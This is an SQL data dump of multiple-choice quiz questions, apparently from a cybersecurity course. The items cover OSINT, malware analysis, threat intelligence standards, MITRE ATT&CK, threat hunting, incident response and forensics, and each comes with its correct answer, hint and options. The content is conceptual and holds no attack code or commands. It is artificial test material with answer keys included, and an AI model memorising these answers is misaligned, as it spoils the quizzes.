(7001, 771, 'What is the danger of interacting with threat actors on Telegram?', 1, 'It ruins OPSEC and can be illegal', 0, 'Passive observation is the rule.', '2025-12-29 13:30:45', '[\"You might make friends\", \"It ruins OPSEC and can be illegal\", \"They will ban you\", \"It costs money\"]'),
(7002, 771, 'What is \"Sherlock\" used for?', 2, 'Username enumeration across platforms', 0, 'Finds where else a username exists.', '2025-12-29 13:30:45', '[\"Password cracking\", \"Username enumeration across platforms\", \"WiFi hacking\", \"Decryption\"]'),
(7003, 771, 'Which platform is best for finding corporate hierarchy and tech stacks?', 3, 'LinkedIn', 0, 'The professional network.', '2025-12-29 13:30:45', '[\"TikTok\", \"LinkedIn\", \"Snapchat\", \"Pinterest\"]'),
(7004, 772, 'Which Google Dork finds PDF files?', 1, 'filetype:pdf', 0, 'Standard Google operator.', '2025-12-29 13:30:45', '[\"filetype:pdf\", \"ext:pdf\", \"search:pdf\", \"pdf:yes\"]'),
(7005, 772, 'What does Shodan crawl?', 2, 'Devices and Ports', 0, 'The search engine for the Internet of Things.', '2025-12-29 13:30:45', '[\"Web pages\", \"Devices and Ports\", \"Social Media\", \"Emails\"]'),
(7006, 772, 'Maltego is primarily used for...', 3, 'Visual Link Analysis', 0, 'Graph-based visualization.', '2025-12-29 13:30:45', '[\"Brute forcing\", \"Visual Link Analysis\", \"Coding\", \"Firewalling\"]'),
(7007, 773, 'What does OPSEC stand for?', 1, 'Operational Security', 0, 'Protecting your operations.', '2025-12-29 13:30:45', '[\"Open Security\", \"Operational Security\", \"Optional Security\", \"Operation Secrecy\"]'),
(7008, 773, 'Passive Reconnaissance involves...', 2, 'No direct contact with the target', 0, 'staying invisible.', '2025-12-29 13:30:45', '[\"Touching the target\", \"No direct contact with the target\", \"Hacking the target\", \"Asking the target questions\"]'),
(7009, 773, 'A \"Sock Puppet\" should...', 3, 'Have a realistic backstory and no link to you', 0, 'To blend in.', '2025-12-29 13:30:45', '[\"Be linked to your real identity\", \"Have a realistic backstory and no link to you\", \"Be an empty profile\", \"Use your work email\"]'),
(7010, 773, 'Which DNS record helps map Email infrastructure?', 4, 'MX', 0, 'Mail Exchanger.', '2025-12-29 13:30:45', '[\"A\", \"MX\", \"CNAME\", \"PTR\"]'),
(7011, 773, 'Which tool archives historical versions of websites?', 5, 'Wayback Machine', 0, 'Archive.org.', '2025-12-29 13:30:45', '[\"Shodan\", \"Wayback Machine\", \"Nmap\", \"Wireshark\"]'),
(7012, 773, 'What is \"Google Dorking\"?', 6, 'Using advanced search operators to find sensitive info', 0, 'Advanced search queries.', '2025-12-29 13:30:45', '[\"Hacking Google servers\", \"Using advanced search operators to find sensitive info\", \"Creating fake Google accounts\", \"Deleting Google results\"]'),
(7013, 773, 'Shodan is best for finding...', 7, 'Webcams, Servers, and IoT devices', 0, 'Internet connected hardware.', '2025-12-29 13:30:45', '[\"People\", \"Webcams, Servers, and IoT devices\", \"News articles\", \"Credit cards\"]'),
(7014, 773, 'Why search \"Certificate Transparency\" logs?', 8, 'To discover subdomains', 0, 'Certs reveal hostnames.', '2025-12-29 13:30:45', '[\"To find passwords\", \"To discover subdomains\", \"To update SSL\", \"To hide traffic\"]'),
(7015, 773, 'What information does WHOIS provide?', 9, 'Domain ownership and registration data', 0, 'Registrar info.', '2025-12-29 13:30:45', '[\"Domain ownership and registration data\", \"Website source code\", \"Database passwords\", \"User traffic\"]'),
(7016, 773, 'Which platform is most useful for corporate reconnaissance (employees, jobs)?', 10, 'LinkedIn', 0, 'Professional context.', '2025-12-29 13:30:45', '[\"Instagram\", \"LinkedIn\", \"Twitch\", \"Snapchat\"]'),
(7017, 774, 'What is Static Analysis?', 1, 'Analyzing the file without execution', 0, 'Looking at the code/properties at rest.', '2025-12-29 13:38:32', '[\"Running the malware\", \"Analyzing the file without execution\", \"Deleting the file\", \"Updating antivirus\"]'),
(7018, 774, 'Which tool captures network traffic during Dynamic Analysis?', 2, 'Wireshark', 0, 'Packet analyzer.', '2025-12-29 13:38:32', '[\"Wireshark\", \"Notepad\", \"Calculator\", \"Zip\"]'),
(7019, 774, 'Why use a Sandbox?', 3, 'To isolate the malware so it doesn\'t infect the host', 0, 'Safety first.', '2025-12-29 13:38:32', '[\"To play with sand\", \"To isolate the malware so it doesn\'t infect the host\", \"To make the computer faster\", \"To encrypt the virus\"]'),
(7020, 775, 'Does changing one byte in a file change its Hash?', 1, 'Yes, completely', 0, 'Avalanche effect.', '2025-12-29 13:38:32', '[\"Yes, completely\", \"No\", \"Only if it is a large file\", \"Maybe\"]'),
(7021, 775, 'What is a \"PDB Path\"?', 2, 'A debug path left by the compiler showing the attacker\'s folder structure', 0, 'Program Database path.', '2025-12-29 13:38:32', '[\"A database path\", \"A debug path left by the compiler showing the attacker\'s folder structure\", \"A public domain\", \"A protocol\"]'),
(7022, 775, 'If you see very few strings in a binary, it is likely...', 3, 'Packed or Obfuscated', 0, 'Packing hides text.', '2025-12-29 13:38:32', '[\"Clean\", \"Packed or Obfuscated\", \"Empty\", \"A text file\"]'),
(7023, 776, 'What is the safest way to analyze a suspicious file initially?', 1, 'Static Analysis', 0, 'No execution = Minimum risk.', '2025-12-29 13:38:32', '[\"Double click it\", \"Static Analysis\", \"Dynamic Analysis on your host\", \"Email it to a friend\"]'),
(7024, 776, 'Which hash algorithm is currently the industry standard for IOCs?', 2, 'SHA256', 0, 'Secure Hash Algorithm 256-bit.', '2025-12-29 13:38:32', '[\"MD5\", \"SHA256\", \"CRC32\", \"ROT13\"]'),
(7025, 776, 'What is a \"Sandbox\"?', 3, 'An isolated environment for safely running malware', 0, 'Isolation is key.', '2025-12-29 13:38:32', '[\"A playground\", \"An isolated environment for safely running malware\", \"A hacking tool\", \"A firewall\"]'),
(7026, 776, 'Dynamic Analysis observes...', 4, 'File behavior at runtime (Registry, Network, File system)', 0, 'Behavioral analysis.', '2025-12-29 13:38:32', '[\"Code structure\", \"File behavior at runtime (Registry, Network, File system)\", \"File size only\", \"Author name\"]'),
(7027, 776, 'If a file is \"Packed\", what must happen before it runs?', 5, 'It must unpack itself in memory', 0, 'Decompression/Decryption.', '2025-12-29 13:38:32', '[\"It must be deleted\", \"It must unpack itself in memory\", \"It must be compiled\", \"It must hold still\"]'),
(7028, 776, 'Which tool extracts readable text from a binary?', 6, 'strings', 0, 'The strings command.', '2025-12-29 13:38:32', '[\"strings\", \"grep\", \"cat\", \"ls\"]'),
(7029, 776, 'What does C2 stand for?', 7, 'Command & Control', 0, 'The server managing the botnet.', '2025-12-29 13:38:32', '[\"Command & Control\", \"Cool & Calm\", \"Computer 2\", \"Cyber Command\"]'),
(7030, 776, 'Why check a file hash on VirusTotal?', 8, 'To see if other vendors have already detected it', 0, 'Community intelligence.', '2025-12-29 13:38:32', '[\"To download the virus\", \"To see if other vendors have already detected it\", \"To delete the internet\", \"To hack Google\"]'),
(7031, 776, 'Pestudio is primarily used for...', 9, 'Static Analysis', 0, 'Analyzing PE headers/strings.', '2025-12-29 13:38:32', '[\"Dynamic Analysis\", \"Static Analysis\", \"Writing Reports\", \"Chatting\"]'),
(7032, 776, 'Ransomware typically does what?', 10, 'Encrypts files and demands payment', 0, 'Encryption for extortion.', '2025-12-29 13:38:32', '[\"Encrypts files and demands payment\", \"Steals passwords\", \"Mines crypto\", \"Shows ads\"]'),
(7033, 777, 'Which is an example of an IOC?', 1, 'A known malicious file hash', 0, 'Static evidence.', '2025-12-29 13:38:32', '[\"High CPU usage\", \"A known malicious file hash\", \"Slow network\", \"A user logging in\"]'),
(7034, 777, 'Which indicator focuses on \"Behavior\" and \"Intent\"?', 2, 'IOA', 0, 'Indicator of Attack.', '2025-12-29 13:38:32', '[\"IOC\", \"IOA\", \"URL\", \"IP\"]'),
(7035, 777, 'Which is harder for an attacker to change?', 3, 'Their Behavior/Tactics (IOA)', 0, 'Changing TTPs requires retraining.', '2025-12-29 13:38:32', '[\"Their IP address\", \"Their File Hash\", \"Their Behavior/Tactics (IOA)\", \"Their Domain\"]'),
(7036, 778, 'Can you verify TLP:RED intel with a third party?', 1, 'No - never', 0, 'Verified only with source.', '2025-12-29 13:38:32', '[\"Yes\", \"No - never\", \"Only if you trust them\", \"Maybe\"]'),
(7037, 778, 'Which TLP level allows sharing with the general public?', 2, 'CLEAR', 0, 'White/Clear = Public.', '2025-12-29 13:38:32', '[\"CLEAR\", \"GREEN\", \"AMBER\", \"RED\"]'),
(7038, 778, 'TLP:AMBER allows sharing with...', 3, 'Your organization and clients on need-to-know basis', 0, 'Restricted distribution.', '2025-12-29 13:38:32', '[\"The internet\", \"Your organization and clients on need-to-know basis\", \"Only 1 person\", \"Anyone\"]'),
(7039, 779, 'What does STIX stand for?', 1, 'Structured Threat Information Expression', 0, 'Standard language for CTI.', '2025-12-29 13:38:32', '[\"Structured Threat Information Expression\", \"Standard Text Info X\", \"Secure Threat Intel Xchange\", \"Simple Text Index\"]'),
(7040, 779, 'What is TAXII?', 2, 'The transport mechanism for STIX', 0, 'Trusted Automated Exchange of Intelligence Information.', '2025-12-29 13:38:32', '[\"The transport mechanism for STIX\", \"A cab service\", \"A file format\", \"A virus\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(7041, 779, 'Which is an IOC?', 3, '192.168.1.1 (C2 IP)', 0, 'Artifact.', '2025-12-29 13:38:32', '[\"192.168.1.1 (C2 IP)\", \"Port Scanning Activity\", \"Pass the Hash Attack\", \"Phishing Methodology\"]'),
(7042, 779, 'Which is an IOA?', 4, 'Cred Dumping from LSASS', 0, 'Behavior.', '2025-12-29 13:38:32', '[\"File Hash\", \"Cred Dumping from LSASS\", \"Domain Name\", \"Email Subject\"]'),
(7043, 779, 'TLP:RED means...', 5, 'Not for disclosure, restricted to specific recipients', 0, 'Most restrictive.', '2025-12-29 13:38:32', '[\"Share with everyone\", \"Share with community\", \"Not for disclosure, restricted to specific recipients\", \"Share with Org\"]'),
(7044, 779, 'If you receive TLP:GREEN info, can you post it on Twitter?', 6, 'No', 0, 'Twitter = Public (CLEAR). Green is Community.', '2025-12-29 13:38:32', '[\"Yes\", \"No\", \"Only if anonymous\", \"If its cool\"]'),
(7045, 779, 'Why use Standards like STIX?', 7, 'To allow automated machine-to-machine sharing', 0, 'Interoperability.', '2025-12-29 13:38:32', '[\"To make things complicated\", \"To allow automated machine-to-machine sharing\", \"To encrypt data\", \"To hide info\"]'),
(7046, 779, 'David Bianco\'s Pyramid of Pain places what at the top (Hardest for attacker)?', 8, 'TTPs (Tactics, Techniques, Procedures)', 0, 'Behavior is hardest to change.', '2025-12-29 13:38:32', '[\"Hash Values\", \"IP Addresses\", \"TTPs (Tactics, Techniques, Procedures)\", \"Domain Names\"]'),
(7047, 779, 'Who manages the TLP standard?', 9, 'FIRST.org', 0, 'Forum of Incident Response and Security Teams.', '2025-12-29 13:38:32', '[\"FIRST.org\", \"Google\", \"Microsoft\", \"Nobody\"]'),
(7048, 779, 'An IP Address in the Pyramid of Pain is...', 10, 'Easy to change (Low Pain)', 0, 'Attacker just rents a new VPS.', '2025-12-29 13:38:32', '[\"Easy to change (Low Pain)\", \"Impossible to change\", \"Tough\", \"Annoying\"]'),
(7049, 780, 'In MITRE ATT&CK, \"Initial Access\" is a...', 1, 'Tactic (Goal)', 0, 'The \'Why\'.', '2025-12-29 13:38:32', '[\"Tactic (Goal)\", \"Technique (Method)\", \"Procedure\", \"Tool\"]'),
(7050, 780, 'In MITRE ATT&CK, \"Spearphishing Attachment\" is a...', 2, 'Technique', 0, 'The \'How\'.', '2025-12-29 13:38:32', '[\"Tactic\", \"Technique\", \"Procedure\", \"Matrix\"]'),
(7051, 780, 'What does the matrix help defenders do?', 3, 'Map defenses against real-world threats', 0, 'Gap analysis.', '2025-12-29 13:38:32', '[\"Map defenses against real-world threats\", \"Install virus\", \"Hack back\", \"Guess passwords\"]'),
(7052, 781, 'What is the Navigator used for?', 1, 'Visualizing/Heatmapping the matrix', 0, 'Annotating layers.', '2025-12-29 13:38:32', '[\"Visualizing/Heatmapping the matrix\", \"Browsing the web\", \"GPS\", \"Chatting\"]'),
(7053, 781, 'If you color techniques used by Ransomware red, you are doing...', 2, 'Threat Modeling / Emulation Planning', 0, 'Visualizing the adversary.', '2025-12-29 13:38:32', '[\"Threat Modeling / Emulation Planning\", \"Defensive Coverage\", \"Coding\", \"Patching\"]'),
(7054, 781, 'Where can you access Navigator?', 3, 'Github / MITRE Website', 0, 'It is an open web app.', '2025-12-29 13:38:32', '[\"Github / MITRE Website\", \"Dark Web\", \"Only offline\", \"App Store\"]'),
(7055, 782, 'What is a \"Tactic\" in ATT&CK?', 1, 'The adversary\'s technical goal (The Why)', 0, 'High level objective.', '2025-12-29 13:38:32', '[\"The adversary\'s technical goal (The Why)\", \"The specific command\", \"The tool used\", \"The IP address\"]'),
(7056, 782, 'What is a \"Technique\"?', 2, 'How the goal is achieved', 0, 'The method.', '2025-12-29 13:38:32', '[\"How the goal is achieved\", \"The goal itself\", \"The date of attack\", \"The victim\"]'),
(7057, 782, '\"Persistence\" is an example of...', 3, 'Tactic', 0, 'Staying in the system.', '2025-12-29 13:38:32', '[\"Tactic\", \"Technique\", \"Software\", \"Actor\"]'),
(7058, 782, '\"Registry Run Keys\" is an example of...', 4, 'Technique', 0, 'A way to achieve Persistence.', '2025-12-29 13:38:32', '[\"Technique\", \"Tactic\", \"Procedure\", \"MITRE\"]'),
(7059, 782, 'What is \"Sub-Technique\"?', 5, 'A more specific implementation of a technique', 0, 'e.g., T1059.001 (PowerShell) under Command Scripting.', '2025-12-29 13:38:32', '[\"A more specific implementation of a technique\", \"A smaller tactic\", \"A tool\", \"A user\"]'),
(7060, 782, 'Why is Mapping to MITRE important?', 6, 'It provides a common language for defenders and red teams', 0, 'Standardization.', '2025-12-29 13:38:32', '[\"It provides a common language for defenders and red teams\", \"It is fun\", \"It is required for windows updates\", \"It prevents all hacks\"]'),
(7061, 782, 'Who maintains ATT&CK?', 7, 'MITRE Corp', 0, 'Federally Funded R&D Center.', '2025-12-29 13:38:32', '[\"MITRE Corp\", \"Microsoft\", \"Google\", \"FBI\"]'),
(7062, 782, 'What does the \"Enterprise\" matrix cover?', 8, 'Windows, Linux, macOS, Cloud networks', 0, 'Standard IT networks.', '2025-12-29 13:38:32', '[\"Windows, Linux, macOS, Cloud networks\", \"Mobile phones only\", \"Satellites\", \"Cars\"]'),
(7063, 782, 'Can Navigator export layers?', 9, 'Yes, as JSON or SVG', 0, 'For sharing.', '2025-12-29 13:38:32', '[\"Yes, as JSON or SVG\", \"No\", \"Only PDF\", \"Only PNG\"]'),
(7064, 782, 'ATT&CK is based on...', 10, 'Real-world observations', 0, 'Evidence based.', '2025-12-29 13:38:32', '[\"Real-world observations\", \"Theoretical hacks\", \"Sci-fi movies\", \"Random guesses\"]'),
(7065, 783, 'What is the primary difference between SOC and Threat Hunting?', 1, 'SOC is Reactive, Hunting is Proactive', 0, 'Alerts vs Search.', '2025-12-29 13:38:32', '[\"SOC is Reactive, Hunting is Proactive\", \"SOC works at night\", \"Hunting uses guns\", \"No difference\"]'),
(7066, 783, 'What does \"Assume Breach\" mean?', 2, 'Assume the network is compromised and look for evidence', 0, 'Proactive stance.', '2025-12-29 13:38:32', '[\"Assume the network is compromised and look for evidence\", \"Breach the network yourself\", \"Assume security is perfect\", \"Give up\"]'),
(7067, 783, 'What metric does Hunting aim to reduce?', 3, 'Dwell Time', 0, 'Time undetected.', '2025-12-29 13:38:32', '[\"Dwell Time\", \"Cost\", \"False Positives\", \"Ping\"]'),
(7068, 784, 'In \"Stacking\", where is the malicious activity usually found?', 1, 'The Long Tail (Least Frequent)', 0, 'Malware is the anomaly.', '2025-12-29 13:38:32', '[\"The Long Tail (Least Frequent)\", \"The Short Stack (Most Frequent)\", \"The Middle\", \"Everywhere\"]'),
(7069, 784, 'What is \"Stacking\" also known as?', 2, 'Frequency Analysis', 0, 'Counting stats.', '2025-12-29 13:38:32', '[\"Frequency Analysis\", \"Stack Overflow\", \"Heap Spray\", \"Sorting\"]'),
(7070, 784, 'Clustering helps to...', 3, 'Identify outliers by grouping similar items', 0, 'Finding the odd one out.', '2025-12-29 13:38:32', '[\"Identify outliers by grouping similar items\", \"Encrypt data\", \"Delete logs\", \"Generate alerts\"]'),
(7071, 785, 'Defining a Hypothesis is the first step of...', 1, 'A Structured Hunt', 0, 'Hypothesis-Driven Hunting.', '2025-12-29 13:38:32', '[\"A Structured Hunt\", \"Incident Response\", \"Malware Analysis\", \"Patching\"]'),
(7072, 785, 'Which is a valid Hypothesis?', 2, 'APT29 uses PowerShell for lateral movement', 0, 'Specific and testable proposition.', '2025-12-29 13:38:32', '[\"APT29 uses PowerShell for lateral movement\", \"I will find bad stuff\", \"PowerShell is bad\", \"Updates are essential\"]'),
(7073, 785, 'If you stack \"User Agents\", which one is fast investigation?', 3, 'Python-urllib/2.7 (Count: 1)', 0, 'Low count + suspicious string = Priority.', '2025-12-29 13:38:32', '[\"Mozilla/5.0 (Windows NT 10.0)... (Count: 5000)\", \"Python-urllib/2.7 (Count: 1)\", \"Chrome/90 (Count: 4000)\", \"Edge/89 (Count: 2000)\"]'),
(7074, 785, 'What separates Hunting from Incident Response?', 4, 'Hunting looks for unknown threats; IR handles known incidents', 0, 'Discovery vs Reaction.', '2025-12-29 13:38:32', '[\"Hunting looks for unknown threats; IR handles known incidents\", \"Hunting is faster\", \"IR is cheaper\", \"Hunting is automated\"]'),
(7075, 785, 'The \"Baseline\" is...', 5, 'Known Good behavior', 0, 'You need to know what is Normal to find what is Abnormal.', '2025-12-29 13:38:32', '[\"Known Good behavior\", \"Known Bad behavior\", \"A firewall rule\", \"A password\"]'),
(7076, 785, 'What is a \"Pivot\"?', 6, 'Moving from one data point to another related one', 0, 'e.g., Domain -> IP -> Other Domains.', '2025-12-29 13:38:32', '[\"Moving from one data point to another related one\", \"Turning around\", \"Deleting a row\", \"Closing a ticket\"]'),
(7077, 785, 'Checking for \"Beaconing\" traffic is analyzing...', 7, 'Regular interval communications (Heartbeats)', 0, 'C2 callbacks.', '2025-12-29 13:38:32', '[\"Regular interval communications (Heartbeats)\", \"Large file downloads\", \"SQL Injection\", \"Password failures\"]'),
(7078, 785, 'Least Frequency Analysis is effective for finding...', 8, 'Rare events', 0, 'Outliers.', '2025-12-29 13:38:32', '[\"Rare events\", \"Common events\", \"System files\", \"Updates\"]'),
(7079, 785, 'A \"Hunt\" should always result in...', 9, 'Ideally a detection rule or improved visibility', 0, 'Improving the security posture regardless of finding a breach.', '2025-12-29 13:38:32', '[\"Ideally a detection rule or improved visibility\", \"A verified breach\", \"Firing someone\", \"Installing an antivirus\"]'),
(7080, 785, 'Assume Breach implies...', 10, 'Defenses can fail', 0, 'Accepting risk.', '2025-12-29 13:38:32', '[\"Defenses can fail\", \"Defenses act perfectly\", \"Hackers are lazy\", \"Firewalls stop everything\"]'),
(7081, 786, 'What involves confirming multiple feeds reporting the same indicator?', 1, 'Deduplication/Correlation', 0, 'Merging duplicates.', '2025-12-29 13:38:32', '[\"Deduplication/Correlation\", \"Encryption\", \"Deletion\", \"Scanning\"]'),
(7082, 786, 'Why \"Enrich\" an indicator?', 2, 'To add context (e.g., GeoIP, ASM Info, Rep Score)', 0, 'Context aids decision making.', '2025-12-29 13:38:32', '[\"To add context (e.g., GeoIP, ASM Info, Rep Score)\", \"To make it expensive\", \"To encrypt it\", \"To hide it\"]'),
(7083, 786, 'Pushing IOCs to a SIEM is part of...', 3, 'Integration / Dissemination', 0, 'Actioning the intel.', '2025-12-29 13:38:32', '[\"Integration / Dissemination\", \"Collection\", \"Planning\", \"Analysis\"]'),
(7084, 787, 'In MISP, what represents a \"Threat Actor\" or \"Mitre Technique\"?', 1, 'Galaxy / Tag', 0, 'Contextual metadata.', '2025-12-29 13:38:32', '[\"Galaxy / Tag\", \"Attribute\", \"Event\", \"User\"]'),
(7085, 787, 'The top-level container in MISP is an...', 2, 'Event', 0, 'Events contain attributes.', '2025-12-29 13:38:32', '[\"Event\", \"Attribute\", \"Object\", \"Server\"]'),
(7086, 787, 'MISP allows you to...', 3, 'Share and Sync intelligence with other organizations', 0, 'Community sharing.', '2025-12-29 13:38:32', '[\"Share and Sync intelligence with other organizations\", \"Scan viruses\", \"Hack websites\", \"Manage passwords\"]'),
(7087, 788, 'Which is a popular Graph-based TIP?', 1, 'OpenCTI', 0, 'Knowledge Graph platform.', '2025-12-29 13:38:32', '[\"OpenCTI\", \"Notepad++\", \"Calculator\", \"Outlook\"]'),
(7088, 788, 'What is the benefit of a Knowledge Graph (OpenCTI)?', 2, 'Visualizing complex relationships between entities', 0, 'Graph theory.', '2025-12-29 13:38:32', '[\"Visualizing complex relationships between entities\", \"Saving disk space\", \"Faster typing\", \"Cheaper hosting\"]'),
(7089, 788, 'Why \"Normalize\" data in a TIP?', 3, 'To store diverse feeds in a consistent format', 0, 'Standardization.', '2025-12-29 13:38:32', '[\"To store diverse feeds in a consistent format\", \"To delete it\", \"To encrypt it\", \"To hide source\"]'),
(7090, 788, 'If you have zero budget, which TIP is best?', 4, 'MISP (Open Source)', 0, 'Free and open source.', '2025-12-29 13:38:32', '[\"MISP (Open Source)\", \"Splunk Enterprise\", \"Recorded Future\", \"CrowdStrike\"]'),
(7091, 788, 'What is an \"IoC Decay\" or \"Expiration\"?', 5, 'Retiring an indicator when it is no longer malicious', 0, 'Lifecycle management.', '2025-12-29 13:38:32', '[\"Retiring an indicator when it is no longer malicious\", \"Deleting files\", \"Password expiry\", \"Server crash\"]'),
(7092, 788, 'Enrichment Connectors typically query...', 6, 'External APIs (VirusTotal, AlienVault)', 0, 'Third party data.', '2025-12-29 13:38:32', '[\"External APIs (VirusTotal, AlienVault)\", \"Local files\", \"Printers\", \"Keyboards\"]'),
(7093, 788, 'Sharing an Event in MISP creates a...', 7, 'Distributed warning to the community', 0, 'Collective defense.', '2025-12-29 13:38:32', '[\"Distributed warning to the community\", \"Security breach\", \"Firewall rule\", \"False positive\"]'),
(7094, 788, 'Can a TIP automate firewall blocking?', 8, 'Yes, via integration/orchestration', 0, 'SOAR capabilities.', '2025-12-29 13:38:32', '[\"Yes, via integration/orchestration\", \"No, never\", \"Only if manual\", \"Only on Tuesdays\"]'),
(7095, 788, 'Attributes in MISP can be marked as...', 9, 'to_ids (Actionable for IDS)', 0, 'Flag indicating if it should be exported to security controls.', '2025-12-29 13:38:32', '[\"to_ids (Actionable for IDS)\", \"Private\", \"Deleted\", \"Fun\"]'),
(7096, 788, 'STIX 2.0 uses what format?', 10, 'JSON', 0, 'Modern standard.', '2025-12-29 13:38:32', '[\"JSON\", \"XML\", \"CSV\", \"Binary\"]'),
(7097, 789, 'What is BLUF?', 1, 'Bottom Line Up Front', 0, 'Conclusion first.', '2025-12-29 13:38:32', '[\"Bottom Line Up Front\", \"Blue Light\", \"Bottom Left\", \"Big Line\"]'),
(7098, 789, 'Who is the audience for a \"Strategic\" report?', 2, 'Executives', 0, 'Decision makers.', '2025-12-29 13:38:32', '[\"Executives\", \"SOC Analysts\", \"Engineers\", \"Hackers\"]'),
(7099, 789, 'Why use \"Estimative Language\"?', 3, 'To standardize uncertainty and confidence', 0, 'Clarity of probability.', '2025-12-29 13:38:32', '[\"To standardize uncertainty and confidence\", \"To sound smart\", \"To confuse people\", \"To avoid liability\"]'),
(7100, 790, 'Which statement uses proper Estimative Language?', 1, 'It is LIKELY that APT29 is responsible', 0, 'Standard term.', '2025-12-29 13:38:32', '[\"It is LIKELY that APT29 is responsible\", \"Maybe it is APT29\", \"I believe it is APT29\", \"It is 100% APT29\"]'),
(7101, 790, 'Strategic Reports should focus on...', 2, 'Business Risk and Impact', 0, 'Executive view.', '2025-12-29 13:38:32', '[\"Business Risk and Impact\", \"IP Addresses\", \"Malware code\", \"Logs\"]'),
(7102, 790, 'Tactical Reports should focus on...', 3, 'Actionable IOCs and Rules', 0, 'Defender view.', '2025-12-29 13:38:32', '[\"Actionable IOCs and Rules\", \"Financial loss\", \"Geopolitics\", \"Trends\"]'),
(7103, 790, 'What is \"Words of Estimative Probability\" (WEP)?', 4, 'Standard terms to convey likelihood', 0, 'Intelligence standard.', '2025-12-29 13:38:32', '[\"Standard terms to convey likelihood\", \"A spell check tool\", \"A thesaurus\", \"A translation\"]'),
(7104, 790, 'A report with 50 pages of technical details should usually include...', 5, 'An Executive Summary (BLUF)', 0, 'For the busy reader.', '2025-12-29 13:38:32', '[\"An Executive Summary (BLUF)\", \"A poem\", \"No summary\", \"Pictures of cats\"]'),
(7105, 790, 'Dissemination via API is best for...', 6, 'Speed and Automation', 0, 'Machine consumption.', '2025-12-29 13:38:32', '[\"Speed and Automation\", \"Executives\", \"Legal Reviews\", \"Press Releases\"]'),
(7106, 790, 'Feedback in the intel cycle ensures...', 7, 'Relevance and Improvement', 0, 'Quality control.', '2025-12-29 13:38:32', '[\"Relevance and Improvement\", \"Payment\", \"Deletion\", \"Encryption\"]'),
(7107, 790, 'If you have Low Confidence, you should...', 8, 'State it clearly', 0, 'Honesty in analysis.', '2025-12-29 13:38:32', '[\"State it clearly\", \"Lie\", \"Say High Confidence\", \"Say nothing\"]'),
(7108, 790, 'Intelligence Requirements (IRs) drive the...', 9, 'Entire Intelligence Cycle', 0, 'The starting point.', '2025-12-29 13:38:32', '[\"Entire Intelligence Cycle\", \"Lunch menu\", \"Server updates\", \"HR policy\"]'),
(7109, 790, 'Which is NOT a goal of reporting?', 10, 'To confuse the reader', 0, 'Clarity is King.', '2025-12-29 13:38:32', '[\"To confuse the reader\", \"To inform decisions\", \"To warn of threats\", \"To document findings\"]'),
(7110, 791, 'Which phase of the incident response lifecycle involves creating an Incident Response Plan (IRP) and deploying security tools?', 1, 'Preparation', 0, 'This happens before an incident ever occurs.', '2026-03-09 22:28:54', '[\"Eradication\",\"Containment\",\"Identification\",\"Preparation\"]'),
(7111, 791, 'During which phase do you isolate an infected endpoint from the corporate network?', 2, 'Containment', 0, 'You are trying to stop the spread of the infection.', '2026-03-09 22:28:54', '[\"Lessons Learned\",\"Containment\",\"Recovery\",\"Identification\"]'),
(7112, 791, 'What does the acronym PICERL stand for? (Enter the 6 words separated by spaces)', 3, 'Preparation Identification Containment Eradication Recovery Lessons Learned', 0, 'P I C E R LL', '2026-03-09 22:28:54', '[\"Prepare Investigate Contain Eradicate Recover Learn\",\"Protect Identify Contain Erase Restore Learn\",\"Plan Identify Contain Eradicate Recover Learn\",\"Preparation Identification Containment Eradication Recovery Lessons Learned\"]'),
(7113, 791, 'In which phase do you patch the vulnerability that the attacker originally exploited?', 4, 'Eradication', 0, 'Removing the root cause and the malware itself.', '2026-03-09 22:28:54', '[\"Containment\",\"Identification\",\"Recovery\",\"Eradication\"]'),
(7114, 791, 'Reviewing SIEM alerts to determine if an event is a false positive or a true security breach happens in which phase?', 5, 'Identification', 0, 'You are detecting and confirming the threat.', '2026-03-09 22:28:54', '[\"Preparation\",\"Lessons Learned\",\"Containment\",\"Identification\"]'),
(7115, 792, 'Which branch of digital forensics focuses on analyzing packets to track data exfiltration or Command and Control traffic?', 1, 'Network Forensics', 0, 'Analyzing traffic traversing wires or airwaves.', '2026-03-09 22:28:54', '[\"Disk Forensics\",\"Network Forensics\",\"Memory Forensics\",\"Mobile Forensics\"]'),
(7116, 792, 'Which branch of forensics analyzes running processes and decrypted passwords that would be lost if the machine was rebooted?', 2, 'Memory Forensics', 0, 'Also known as RAM forensics.', '2026-03-09 22:28:54', '[\"Network Forensics\",\"Disk Forensics\",\"Mobile Forensics\",\"Memory Forensics\"]'),
(7117, 792, 'Which forensics tool is considered the industry standard for Memory Forensics? (Mentioned in the reading)', 3, 'Volatility', 0, 'Starts with V.', '2026-03-09 22:28:54', '[\"Autopsy\",\"Wireshark\",\"Volatility\",\"EnCase\"]'),
(7118, 792, 'Taking a bit-by-bit exact copy of a hard drive is primarily associated with which branch of forensics?', 4, 'Disk Forensics', 0, 'Also known as Computer Forensics.', '2026-03-09 22:28:54', '[\"Memory Forensics\",\"Disk Forensics\",\"Mobile Forensics\",\"Network Forensics\"]'),
(7119, 792, 'What is the primary conflict between Business Operations and the Forensics team during an incident?', 5, 'Speed vs Preservation', 0, 'The business wants to go fast, forensics wants to save evidence.', '2026-03-09 22:28:54', '[\"Open Source vs Commercial Tools\",\"Speed vs Preservation\",\"Cost vs Quality\",\"Internal vs External Threat\"]'),
(7120, 793, 'What is the chronological, written record detailing the control and transfer of evidence called?', 1, 'Chain of Custody', 0, 'It proves who had the evidence and when.', '2026-03-09 22:28:54', '[\"Evidence Ledger\",\"Incident Report\",\"Chain of Custody\",\"Writ of Possession\"]'),
(7121, 793, 'What mathematical technique is used to create a digital fingerprint of a file to prove it has not been altered?', 2, 'Hashing', 0, 'Examples include MD5 or SHA-256.', '2026-03-09 22:28:54', '[\"Encoding\",\"Compression\",\"Encryption\",\"Hashing\"]'),
(7122, 793, 'If you change a single pixel in an image file, will the SHA-256 hash of that file remain the same or change?', 3, 'Change', 0, 'Even the smallest alteration completely changes the output.', '2026-03-09 22:28:54', '[\"Remain the same\",\"It depends on the image format\",\"Change\",\"SHA-256 ignores pixels\"]'),
(7123, 793, 'What device or software is used to ensure that a suspect\'s hard drive is not accidentally modified during the imaging process?', 4, 'Write Blocker', 0, 'It blocks write commands but allows read commands.', '2026-03-09 22:28:54', '[\"Firewall\",\"Disk Wiper\",\"Write Blocker\",\"Read/Write Head\"]'),
